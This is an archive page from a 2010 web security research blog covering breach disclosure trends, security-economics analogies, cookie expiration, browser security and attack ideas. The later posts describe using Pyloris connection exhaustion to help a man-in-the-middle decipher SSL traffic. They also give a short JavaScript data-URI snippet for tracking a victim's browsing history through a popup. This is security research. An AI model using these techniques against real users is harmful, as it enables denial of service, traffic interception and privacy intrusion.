web application security scanner survey
Paid Advertising
web application security lab

Odds, Disclosure, Etc…

September 14th, 2010

12 posts left…

While doing some research I happened across an old post of mine that I had totally forgotten about. It was an old post about betting on the chances of compromise. Specifically I was asked to give odds against whether I thought Google or ha.ckers.org would survive a penetration test (ultimately leading to disclosure of data). Given that both Google and ha.ckers.org are under constant attack, it stands to reason that sitting in the ecosystem is virtually the equivalent of a penetration test every day. I wasn’t counting things like little bugs that are disclosed in our sites, I was specifically counting only data compromise.

There are a few interesting things about this post, looking back 4 years. The first thing is that pretty much everything I predicted came true in regards to Google:

… their corporate intranet is strewn with varying operating systems, with outdated versions of varying browsers. Ouch. Allowing access from the intranet out to the Internet is a recipe for disaster …

So yes, this is damned near how Google was compromised. However, there’s one very important thing, if I want to be completely honest, that I didn’t understand back then. I gave Google a 1:300 (against) odds on being hacked before ha.ckers.org would be. While I was right, in hindsight, I’d have to change my odds. I should have given it more like 1:30. The important part that I missed was the disclosure piece. Any rational person would assume that Google has had infections before (as has any large corporation that doesn’t retain tight controls over their environment). That’s nothing new - and not what I was talking about anyway. I was talking only about publicly known disclosures of data compromise.

So the part that I didn’t talk to, and the part that is the most interesting is that Google actually disclosed the hack. Now if we were to go back in time and you were to tell me that Google would get hacked into and then disclose that information voluntarily, I would have called BS. Now the cynics might say that Google had no choice - that too many people already knew, and it was either tell the world or have someone out you in a messy way. But that’s irrelevant. I still wouldn’t have predicted it.

So that brings me to the point of the post (as you can hopefully see, this is not a Google bashing post or an I told you so post). I went to Data Loss DB the other day and I noticed an interesting downward trend over the last two years. It could be due to a lot of things. Maybe people are losing their laptops less or maybe hackers have decided to slow down all that hacking they were doing. No, I suspect it’s because in the dawn of social networking and collective thinking, companies fear disclosure more than ever before. They don’t want to have a social uprising against them when people find out their information has been copied off. Since I have no data to back it up, I have a question for all the people who are involved in disclosing or recovering from security events. How many compromises of data security, that you are aware of, have been disclosed to the public as a percentage? You don’t have to post under your own name - I just want to get some idea of what other people are seeing.

If my intuition is correct, this points to the same or more breaches than ever before, but less and less public scrutiny and awareness of what happened to the public’s information. Perhaps this points to a lack of good whistle-blower laws against failing to disclose compromises (and monetary incentives for good Samaritans to do so). Or perhaps this points to a more scary reality where the bad-guys have all the compromised machines and data that they need for the moment. Either way, it’s a very interesting downward trend in the public stats that seems incongruent to what I hear when I talk to people. Is the industry really seeing less successful attacks than a few years ago?

Bear In Woods Or Prairie Dog Ecosystem

September 9th, 2010

13 posts left…

The post I did a few days ago apparently resonated with a lot of people. So I decided to do a quick follow up. If a true ecosystem is not like two guys being chased by a bear in the woods, what is it like? I think the closest real life analogy I can come up with is the humble prairie dog. This is not a hero most people want to liken themselves to, typically. It’s more vermin than role model. But one thing is undeniable - they are a tremendously successful species that have next to no defense mechanisms. So how do they succeed when the fox is on the hunt?

Before I answer that, it’s important to know that prairie dogs aren’t exactly the most friendly beasts to other prey animals that compete for food - like rabbits or ground squirrels and so on. So those animals are not welcome in the prairie dog’s holes in times of plenty. Much in the same way executives are territorial about their intellectual property. But once a real predator, like a fox or a hawk is spotted everything changes. Now the prairie dog will let any prey animals into their holes that can fit, regardless of the fact they may be in competition normally. Now the prairie dog is strong enough to shove out many of those smaller creatures that seek refuge and let them get eaten, thereby removing one competitor, but they don’t and here’s why.

Predators need food to survive (think of a predator as a hacker that profits off of cyber crime in this analogy). If the prairie dog shoves their competitors out to be eaten, now the predator has been sustained. Every time the predator eats they gain enough strength to hunt again and possibly even produce offspring. This works completely contrary to the prairie dog’s goals. No, evolutionarily, the humble prairie dog, who has the biggest hole around, has learned that it’s better to save your competitors to starve your attacker. Starving the predator so they move on or die works much better over the long haul.

The last thing the prairie dog wants is more hawks around, even if that means the prairie dog would be in less competition for food from the other prey animals. Of course, I don’t expect executives to be as smart a rodent right off the bat. But maybe they don’t have to - maybe evolutionary forces are at work even as we speak - and those who fail to cooperate are being eaten. Meanwhile the attacker community grows to whatever the prey companies will support (monetarily or in terms of intellectual property or whatever currency the attacker trades in). There will always be predators in the wild, but the numbers can be limited when the prey work together.

Cookie Expiration

September 8th, 2010

14 posts left…

Day 1 at the OWASP conference in Irvine. Lots of good people here, and tons of good conversations. Talking with Jeremiah from Whitehat and Sid Stamm from Mozilla reminded me that I wanted to talk about cookie expiration. I’m only talking for myself here, and not the average user - but I really dislike the concept of persistent cookies. If I wanted something to persist, I wouldn’t use sandboxes, and violently and regularly clean my cookies by hand. Yet still - cookies persist way too long. Realistically there’s two types of attacks that involve the persistence of cookies. The first is a drive by opportunistic exploit - let’s say you’re on a porn site and it forces your browser to visit MySpace or Facebook and because you’re probably logged in, boom, your compromised via CSRF or clickjacking or whatever. The second is where the attacker knows you’re logged in because they’re attacking you through the very platform that they intend to compromise (likejacking is a good example).

Although we can’t do much about the second case, the first case it comes down to cookie expiration in large part. Why should a browser hold onto a cookie just because the site told it to? If I’m not actively sending requests to the site in question there’s a good chance I don’t want my browser to send cookies after X amount of time. In my case, X is probably an hour or two max (considering I take lunches). Maybe some people would argue that they don’t want to be hassled by typing their webmail password in more than once per day. Okay, fine, but the point is the magic number probably isn’t once every two weeks, or once a month or once every 20 years, for most security people (I’d hope). So perhaps we need to consider a default mechanism for timing cookies out when they’re not actively being sent to the server, regardless of what the server wants. Incidentally, Sid thinks this would make a good addon. Takers?

The Effect of Snakeoil Security

September 4th, 2010

15 posts left…

I’ve talked about this a few times over the years during various presentations but I wanted to document it here as well. It’s a concept that I’ve been wrestling with for 7+ years and I don’t think I’ve made any headway in convincing anyone, beyond a few head nods. Bad security isn’t just bad because it allows you to be exploited. It’s also a long term cost center. But more interestingly, even the most worthless security tools can be proven to “work” if you look at the numbers. Here’s how.

Let’s say hypothetically that you have only two banks in the entire world: banka.com and bankb.com. Let’s say Snakoil salesman goes up to banka.com and convinces banka.com to try their product. Banka.com is thinking that they are seeing increased fraud (as is the whole industry), and they’re willing to try anything for a few months. Worst case they can always get rid of it if it doesn’t do anything. So they implement Snakeoil into their site. The bad guy takes one look at the Snakeoil and shrugs. Is it worth bothering to figure out how banka.com security works and potentially having to modify their code? Nah, why not just focus on bankb.com double up the fraud, and continue doing the exact same thing they were doing before?

Suddenly banka.com is free of fraud. Snakeoil works, they find! They happily let the Snakeoil salesman use them as a use case. So our Snakeoil salesman goes across the street to bankb.com. Bankb.com has seen a two fold increase in fraud over the last few months (all of banka.com’s fraud plus their own), strangely and they’re desperate to do something about it. Snakeoil salesman is happy to show them how much banka.com has decreased their fraud just by buying their shoddy product. Bankb.com is desperate so they say fine and hand over the cash.

Suddenly the bad guy is presented with a problem. He’s got to find a way around this whole Snakeoil software or he’ll be out of business. So he invests a few hours, finds an easy way around it and voila. Back in business. So the bad guy again diversifies his fraud across both banks again. Banka.com sees an increase in fraud back to the old days, which can’t be correlated to anything having to do with the Snakeoil product. Bankb.com sees their fraud drop immediately after having installed the Snakeoil therefore proving that it works twice if you just look at the numbers.

Meanwhile what has happened? Are the users safer? No, and in fact, in some cases it may even make the users less safe (incidentally, we did manage finally stop AcuTrust as the company is completely gone now). Has this stopped the attacker? Only long enough to work around it. What’s the net effect? The two banks are now spending money on a product that does nothing but they are now convinced that it is saving them from huge amounts of fraud. They have the numbers to back it up - although the numbers are only half the story. Now there’s less money to spend on real security measures. Of course, if you look at it from either bank’s perspective the product did save them and they’ll vehemently disagree that the product doesn’t work, but it also created the problem that it solved in the case of bankb.com (double the fraud).

This goes back to the bear in the woods analogy that I personally hate. The story goes that you don’t have to run faster than the bear, you just have to run faster than the guy next to you. While that’s a funny story, that only works if there are two people and you only encounter one bear. In a true ecosystem you have many many people in the same business, and you have many attackers. If you leave your competitor(s) out to dry that may seem good for you in the short term, but in reality you’re feeding your attacker(s). Ultimately you are allowing the attacker ecosystem to thrive by not reducing the total amount of fraud globally. Yes, this means if you really care about fixing your own problem you have to help your competitors. Think about the bear analogy again. If you feed the guy next to you to the bear, now the bear is satiated. That’s great for a while, and you’re safe. But when the bear is hungry again, guess who he’s going after? You’re much better off working together to kill or scare off the bear in that analogy.

Of course if you’re a short-timer CSO who just wants to have a quick win, guess which option you’ll be going for? Jeremiah had a good insight about why better security is rarely implemented and/or sweeping security changes are rare inside big companies. CSOs are typically only around for a few years. They want to go in, make a big win, and get out before anything big breaks or they get hacked into. After a few years they can no longer blame their predecessor either. They have no incentive to make things right, or go for huge wins. Those wins come with too much risk, and they don’t want their name attached to a fiasco. No, they’re better off doing little to nothing, with a few minor wins that they can put on their resume. It’s a little disheartening, but you can probably tell which CSOs are which by how long they’ve stayed put and by the scale of what they’ve accomplished.

Browser Detection Autopwn, etc…

September 4th, 2010

16 posts left…

I often find myself thinking about egyp7’s DefCon speech last year. He was talking about browser autopwn, which was a relatively new concept at that time being built into Metasploit. Pretty cool technology, and with only one minor mishap he was able to demonstrate it on stage with impressive results. That’s all well and fine, and you should check it out, but one thing stuck out from the presentation more than the technology itself.

By doing variable detection he could find out everything down to the individual patch level of the device in most cases. Of course a bad guy can mess with these variables and lie, which egyp7 admitted to. But, wisely he said something to the effect that if you find a browser that is lying about it’s user agent, you probably have found yourself a browser hacker, and you don’t want to try to be owning his browser anyway. Once you find yourself in this condition, bail. The idea mirrors a lot of the type of stuff I wrote about in Detecting Malice. By identifying the signature of browsers and how people navigate sites you can know a lot about your potential adversary. Either for good or, in the case of autopwn, evil. Growing this signature database over time could be very useful as attention on browser exploitation increases and the need for understanding user traffic and intent grows.

The Perils of Speeding up the Browser

September 3rd, 2010

17 posts left until the end…

A year or so ago I went to go visit the Intel guys at their internal conference that they throw (similar to Microsoft’s Bluehat). I honestly had no idea what to tell a bunch of hardware guys. What correlation does chip manufacturing really have with browsers or webapps. Well virtualization and malware certainly, but what else? It got me thinking… one of the things they are in direct control over is how fast operating systems (and subsequently browsers) work. I talked it over with id before going out there. Faster is better right?

I’ve got mixed feelings about fast vs slow browsers. When something is slow, you can actually detect that something strange is going on. It’s also easier to stop it from mis-behaving if an attack takes a while. When it’s fast, it’s much harder to notice that your computer had to chug for a while to do something complex and much less likely that a user can intervene. There have been a number of exploits out there that have really been proof of concept only. They’re deemed not practical because they take too long, or hang the browser temporarily while they’re being executed. If the speed barrier is removed, then suddenly those old proof of concepts (think res:// timing attacks and so on) are actually much easier to perform. So while I think innovation and performance improvement is a good thing overall, it does come with some unintended consequences.

Browser Differences, Minutia Et Al…

September 3rd, 2010

18 posts left…

I got an email last night from someone asking me to do a breakdown of which browser is better, Internet Explorer, Firefox, Opera, Safari and Chrome. First of all, there’s already a pretty good reference that Michal Zalewski put together. Like anything this comprehensive, since it’s not been edited for about half a year it’s already out of date in a few ways, but it’s a great place to get started for those who want to get familiar with the internal differences between various browsers. No need to re-invent the wheel, go read it. Now, that’s the purely technical side, but there is one thing that’s wildly missing from most documents that talk about browser security.

Browser security often turns into a religious war amongst technologists, instead of thinking about it pragmatically. What are the real motives of the companies that are developing the browsers? In most cases they care primarily about market share because market share makes them money (through search engine agreements, and so on). So now you have to think about yourself and your needs. What kind of user are you? I tend to be a very security conscious person, and if you’re reading this you probably are too. I’m willing to severely degrade my usability for an increase in security, whereas most users are not. So the browser I will tend towards is one that offers me the flexibility to make those decisions for myself while still giving me enough usability to be able to do anything I need to do, when I decide to. This is why Firefox has been my personal browser of choice for years - but don’t be confused and think it’s because I think Firefox is more secure out of the box. Firefox has just as many flaws as other browsers, by default.

While security people’s needs are important, if you look at the number of people who are security folks compared to the rest of the world, we are insignificant as a percentage. That means that it is not in the browser company’s interest to focus on appeasing security people. Sure, it’s nice to have a browser that is secure, but that’s not ever going to drive the volume of users necessary to make the real revenue for their organizations - or at least that’s what the market seems to be proving. Plus most of the major browsers above tout themselves as being more secure than their competitors - so normal consumers don’t know who to believe. As such, while I think all the major browsers mentioned above have their pros and cons, none of them are designed with security first. They’re designed for a different set of users in mind (which includes security people, but it also includes our grandmas, and tweens and cousin Cletus), and that puts browser design choices somewhat at odds with security, because what does Cletus care or know about security? So that’s where plugins, addons, sandboxes, VMs, etc… come into play. It’s like wearing a condom around your browser, if you like. It gives us the ability to use the same underlying product while still protecting ourselves as much as possible.

I honestly think most browsers can be made to be very secure, if you’re willing to sacrifice all usability - not completely secure, no doubt, but far more secure than any of the major browsers above ship by default. So, it’s a little hard for me to play favorites. They each have their own security mess to clean up, so currently there is no good solution, and I don’t recommend any browsers to anyone (although you people still on IE6 really should upgrade already). The work involved in really securing your browser simply isn’t worth explaining to most people. In fact, “which browser do you use” is my least favorite question, because it’s not as simple as a single word. Boutique browsers, while interesting, don’t often have the support behind them to make them useful for a lot of the more common applications (lacking vast plugin support, etc…) although of anyone, they actually could align themselves nicely with the needs of security people. So, while I think browser security is often about minutia, we need to fully grasp the market forces at work before getting completely fed up by a constant string of functionality that only makes it less secure, instead of expecting dramatic security improvements. Or we need to pick something more obscure and assume the risks involved with a product that is not tried and true. It’s not an easy problem for us or the browser companies - I don’t envy their situation.

Throttling Traffic Using CSS + Chunked Encoding

September 1st, 2010

19 posts left…

So Pyloris doesn’t work particularly well for port exhaustion on the server, but what if we can exhaust the connections on the client to better meter out traffic? That would make it easier for a MITM to see each individual request if it worked. So I started down a rather complicated path of using a mess load of link tags on an HTTP website trying to affect the connections on the HTTPS version of the same domain. No joy. It turns out that the limits placed on one port don’t affect what happens on another (at least in Firefox). So while I can exhaust all the connections to a domain over a single port I can’t do anything using HTTPS - or so it seemed (unless I was willing to muddy the water further by sending a bunch of requests that I knew are a certain size to the HTTPS site - which just seemed more painful than helpful).

Then, based on some earlier research I stormed into id’s office and I started bitching that there was no point in trying to stop port exhaustion if they were going to allow tons of connections, just over multiple sockets anyway. As the words came out of my mouth I realized I had come up with the answer - a ton of webservers. I guessed that there must be some upper bound of outbound connections and it’s probably at or less than 130. You should have seen id’s face as I asked him to set up 130 connections / 6 connections per socket = 22 web-servers for me. Hahah… I thought he’d kill me.

It turns out it’s nowhere near 130 open connections. Firefox sets a rather arbitrary 30 connection limit. So if you can create 5 open web-servers and exhaust 30 connections and only free up one long enough to allow the victim to download one request at a time, I think we’re in business. Makes sense in theory. The problem is that it’s REALLLLY slow. I mean… painful. In my testing it seemed more like the server was broken entirely from the victim’s perspective. But eventually… and in some cases I mean minutes later - it would load. I’m sure that the attack could be optimized to work based on the fact that no more packets are being sent when the image gets downloaded or whatever… which would signal the program to free up a connection. This is opposed to my crapola time based solution combined with chunked encoding to force the connection to stay open without downloading anything that I came up with for testing. So I bet this attack could work if someone put some tender loving care into it, but it was kind of a huge waste of time for me personally - and for poor id.

Incidentally, for those who have never seen or met id, and would like to know a little about the other side of webappsec that I don’t talk about much here (the configuration, operating system and network), you’re chance is nearing. There’s a rumor that he’ll be speaking at Lascon in October. He’ll be talking on how he’s managed to secure ha.ckers.org for all these years despite how much of a target I’ve made it. :) Should be fun.

Pyloris and Metering Traffic

September 1st, 2010

20 posts left…

Pyloris is a python version of Slowloris, and since it is written in python it’s SSL version is thread safe. So what better way to lock up an SSL/TLS Apache install (given that Apache still hasn’t fixed their DoS)? Well, one of the big problems attackers have when trying to decipher SSL/TLS traffic is the fact that browsers not only send a lot of request down a single connection but they also connect use a bunch of open connections over separate sockets. What if we could use pyloris to exhaust all but one open socket?

Well it turns out that while this sorta works, there are a lot of issues with the concept. Firstly, it requires Apache. Secondly the server can’t be using a load balancer (assuming the load balancer isn’t using Apache itself). Thirdly it requires that there are no other users on the system or there will be a seriously annoying user experience for the poor victim who can’t reach the site that the man in the middle is trying to decipher traffic from. Alas… So while this didn’t work particularly well in my testing, I’m certain with more thinking someone can figure out a way to do this.

XSHM Mark 2

September 1st, 2010

21 posts left…

If you’re familiar with XSHM this is going to look awfully similar (but better). When a script creates a new popup (or tab) it retains control over where to send it at a later date. I talked about this concept before. But let’s see what else can be done. What if the attacker uses the history.length function to calculate how many pages a user has visited after they left the tab for wherever they landed. The attacker could do something like this:

a.location = 'data:text/html;utf-8,<script>alert(history.length);history.go(-1);<\/script>';

By setting either a recursive setTimeout or using some manual polling mechanism, the attacker can (in this case) cause a popup which monitors how many pages they’ve gone. Normally it wouldn’t cause a popup, the attacker would redirect to another domain that they had access to which would do the same history.length check. Voila. The user only sees a brief white flash and then the same page they were just on - as if nothing happened. They’d probably just think their browser is messing up again. This could be helpful in a number of esoteric situations where the number of pages visited may change, or you may want to force them through several flows (and back and forth again) all with a single mouse click - giving you authority to popup in the first place. The best part is that this will follow them while they surf for as long as both windows stay open.